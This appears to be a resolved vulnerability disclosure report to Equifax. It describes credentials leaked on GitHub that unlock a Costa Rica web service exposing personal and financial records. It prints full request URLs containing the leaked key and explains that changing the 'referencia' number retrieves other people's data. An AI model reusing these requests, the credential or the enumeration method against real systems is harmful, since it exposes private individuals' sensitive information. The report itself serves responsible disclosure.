Information Leak (Github)
Critical
E
Equifax-vdp
Submitted None
Actions:
Reported by
zifrox
Vulnerability Details
Technical details and impact analysis
In Github I found some credentials to use in a webservice that exposes very sensitive information of people, family group, financial situation, and more.
Github:
https://github.com/geraldincg/proyecto/blob/9c89787deb1d217f58b58786d90bfb3eab290237/Proyecto/ViewModels/WebService/ConexionWS.cs
The webservice is subdomain for Costa Rica:
Change "referencia" identification number to obtain different results.
Example:
https://webservices.equifax.cr/webservices/efx_consultas.asmx/Estudio_360_Fisico?referencia=891550&Cedula=&Usuario=&Clave=EKJH1QF2IXL3FSI4APWSD5XWFGX63KLK76JFXU80RTCQWS&Usuario_Datum=
https://webservices.equifax.cr/webservices/efx_consultas.asmx/Estudio_360_Fisico?referencia=891547&Cedula=&Usuario=&Clave=EKJH1QF2IXL3FSI4APWSD5XWFGX63KLK76JFXU80RTCQWS&Usuario_Datum=
https://webservices.equifax.cr/webservices/efx_consultas.asmx/Estudio_360_Fisico?referencia=891543&Cedula=&Usuario=&Clave=EKJH1QF2IXL3FSI4APWSD5XWFGX63KLK76JFXU80RTCQWS&Usuario_Datum=
## Impact
An attacker can extract information any people in the system.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved